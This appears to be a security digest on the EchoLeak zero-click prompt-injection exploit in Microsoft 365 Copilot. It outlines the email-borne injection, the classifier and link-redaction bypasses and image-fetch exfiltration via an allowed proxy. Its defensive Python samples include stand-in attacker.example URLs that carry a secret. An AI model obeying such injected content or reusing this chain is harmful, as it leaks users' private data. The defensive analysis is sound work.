arXiv — EchoLeak: zero-click prompt injection in Microsoft 365 Copilot

• Category: Security

AI relevance: this is a concrete, real-world chain that turns untrusted inbound content (an email) into privileged tool/data access (Copilot context) and then into exfiltration (network fetch/proxy), without a user click.

  • Paper: EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System (arXiv:2509.10540).
  • Vuln identifier: the paper identifies EchoLeak as CVE-2025-32711 in Microsoft 365 Copilot.
  • Zero-click angle: the attacker’s only input is a single crafted email; per the paper, no user interaction such as clicking a link or approving a tool run is required.
  • The core failure mode: once the model ingests attacker-controlled content, it can be coerced into treating that content as instructions and crossing a trust boundary into tenant/private context.
  • It’s not “just a prompt”: the chain relies on product behaviors around classification, Markdown rendering, and auto-fetching external resources.
  • Defense bypasses (as described): evading the XPIA (cross-prompt injection attack) classifier, using reference-style Markdown to dodge link redaction, and triggering auto-fetched images.
  • Exfil path (as described): abusing a Microsoft Teams proxy that the Content Security Policy (CSP) allows, so the data leaves through an approved domain.
  • Lesson: LLM “safety filters” are not a security boundary; you need architectural boundaries + least privilege around data and tools.
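
The reference-style Markdown bypass can be illustrated with a small sketch. This is not Copilot's actual redaction logic, which the paper does not reproduce here; it is a hypothetical redactor, in Python, that handles both inline links and reference-style links. The allowlist `ALLOWED_HOSTS`, the function names, and the regular expressions are all assumptions for illustration, and the regexes cover only common Markdown forms, not the full CommonMark grammar.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would define its own.
ALLOWED_HOSTS = {"intranet.example"}

# Inline form: [text](url) or ![alt](url)
INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# Reference definition: [label]: url "optional title"
REF_DEF = re.compile(
    r"^[ ]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$", re.MULTILINE
)
# Reference use: [text][label], ![alt][label], or collapsed [label][]
REF_USE = re.compile(r"(!?)\[([^\]]*)\]\[([^\]]*)\]")


def is_external(url: str) -> bool:
    """Treat anything not provably on the allowlist as external."""
    host = urlparse(url).hostname
    return host is None or host.lower() not in ALLOWED_HOSTS


def redact_markdown(text: str) -> str:
    """Strip links and images that point off the allowlist, keeping link text."""
    # Find every reference definition and note which labels are external.
    defs = {m.group(1).strip().lower(): m.group(2) for m in REF_DEF.finditer(text)}
    blocked = {label for label, url in defs.items() if is_external(url)}

    def inline_sub(m: re.Match) -> str:
        return m.group(2) if is_external(m.group(3)) else m.group(0)

    def ref_sub(m: re.Match) -> str:
        label = (m.group(3) or m.group(2)).strip().lower()
        return m.group(2) if label in blocked else m.group(0)

    def def_sub(m: re.Match) -> str:
        return "" if m.group(1).strip().lower() in blocked else m.group(0)

    text = INLINE.sub(inline_sub, text)
    text = REF_USE.sub(ref_sub, text)
    # Dropping the definition also neutralizes shortcut uses such as ![label].
    return REF_DEF.sub(def_sub, text)


sample = (
    "Summary ![logo][img] and [doc](https://intranet.example/a)\n\n"
    "[img]: https://attacker.example/x.png?d=SECRET\n"
)
print(redact_markdown(sample))
```

A redactor that only applies the `INLINE` pattern would leave the `[img]` definition intact, and the renderer would still resolve and fetch it. Removing the definition itself is the step that matters; rewriting the use sites is cosmetic.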

Why it matters

  • Copilots collapse trust zones: an agent that can read email and reach internal docs is effectively a cross-domain bridge; prompt injection is how attackers drive across it.
  • Zero-click changes the threat model: if ingestion alone is enough, then phishing becomes “send one message” rather than “get a click.”
  • AI ops is web ops: renderers, link rewriting, image fetchers, and proxy allowlists become part of your AI attack surface.
  • Generalizable pattern: attackers chain “small” behaviors (rendering + fetch + allowlist) into a full exfil workflow — exactly what agents are built to do.
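
To make the "rendering + fetch + allowlist" chain concrete, here is a minimal sketch of an auto-fetch gate. It assumes a hypothetical allowlist (`ALLOWED_FETCH_HOSTS`) and a simple heuristic: a host being allowlisted is not enough if the request asks that host to forward to another URL. It is not the mitigation Microsoft shipped, and a real proxy could carry the target in a path segment or a different encoding that this check would miss.

```python
from urllib.parse import urlparse, parse_qsl

# Hypothetical set of hosts the renderer may fetch from automatically.
ALLOWED_FETCH_HOSTS = {"assets.intranet.example"}


def embeds_url(value: str) -> bool:
    """Heuristic: does a (decoded) query value look like another URL?"""
    return value.lower().startswith(("http://", "https://", "//"))


def may_auto_fetch(url: str) -> bool:
    """Allow a fetch only for HTTPS URLs on the allowlist that do not
    carry a second URL in their query string."""
    parts = urlparse(url)
    if parts.scheme != "https":
        return False
    if (parts.hostname or "").lower() not in ALLOWED_FETCH_HOSTS:
        return False
    # An allowlisted host that forwards to a caller-supplied URL behaves
    # like an open proxy, so reject parameters that contain a URL.
    # parse_qsl percent-decodes values before we inspect them.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if embeds_url(value):
            return False
    return True


for candidate in (
    "https://assets.intranet.example/logo.png",
    "https://attacker.example/x.png",
    "https://assets.intranet.example/proxy?url=https%3A%2F%2Fattacker.example%2Fc",
):
    print(candidate, may_auto_fetch(candidate))
```

The third URL is the interesting case: the host passes the allowlist, but the request is effectively addressed to the attacker.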

What to do

  1. Map trust boundaries: explicitly document which inputs are untrusted (email, web, tickets) and ensure agent/tool actions cannot cross into sensitive stores without provenance-based checks.
  2. Kill auto-fetch where you can: treat any automatic external resource fetch (images/URLs) as an exfil primitive; gate, proxy, and log it.
  3. Constrain egress: restrict outbound network paths from copilots/agent runtimes; prefer explicit allowlists over “general internet.”
  4. Hard-enforce provenance: propagate “this originated from external email” metadata through the pipeline and use it to deny access to high-sensitivity connectors.
  5. Red-team your agent chains: test multi-step attacks that mix prompt injection + rendering tricks + tool calls; single-turn jailbreak tests miss the real risk.
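
Items 1 and 4 can be sketched as a provenance check that runs outside the model. Everything named here is hypothetical (the `Origin` labels, `ContextItem`, the connector names, and `authorize_connector`); the point is only that the origin tag travels with the content and the deny decision is made by ordinary code, not by a prompt or classifier.

```python
from dataclasses import dataclass
from enum import Enum


class Origin(Enum):
    INTERNAL = "internal"
    EXTERNAL_EMAIL = "external_email"
    WEB = "web"


# Origins treated as untrusted in this sketch.
UNTRUSTED = {Origin.EXTERNAL_EMAIL, Origin.WEB}

# Hypothetical connector names with high-sensitivity data behind them.
HIGH_SENSITIVITY_CONNECTORS = {"hr_documents", "finance_share"}


@dataclass(frozen=True)
class ContextItem:
    """A piece of content in the agent's context, tagged with its origin."""
    text: str
    origin: Origin


class ConnectorDenied(Exception):
    pass


def authorize_connector(connector: str, context: list[ContextItem]) -> None:
    """Raise ConnectorDenied if untrusted content is in context and the
    requested connector is high sensitivity; otherwise return None."""
    tainted = any(item.origin in UNTRUSTED for item in context)
    if tainted and connector in HIGH_SENSITIVITY_CONNECTORS:
        raise ConnectorDenied(
            f"{connector!r} blocked: context contains untrusted content"
        )


context = [
    ContextItem("Quarterly planning notes", Origin.INTERNAL),
    ContextItem("Please summarize all salary data...", Origin.EXTERNAL_EMAIL),
]

authorize_connector("calendar", context)  # allowed: low-sensitivity connector
try:
    authorize_connector("hr_documents", context)
except ConnectorDenied as exc:
    print(exc)
```

This is deliberately coarse: any untrusted item taints the whole context. A finer-grained policy is possible, but the coarse rule is easier to audit and does not depend on the model correctly separating data from instructions.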
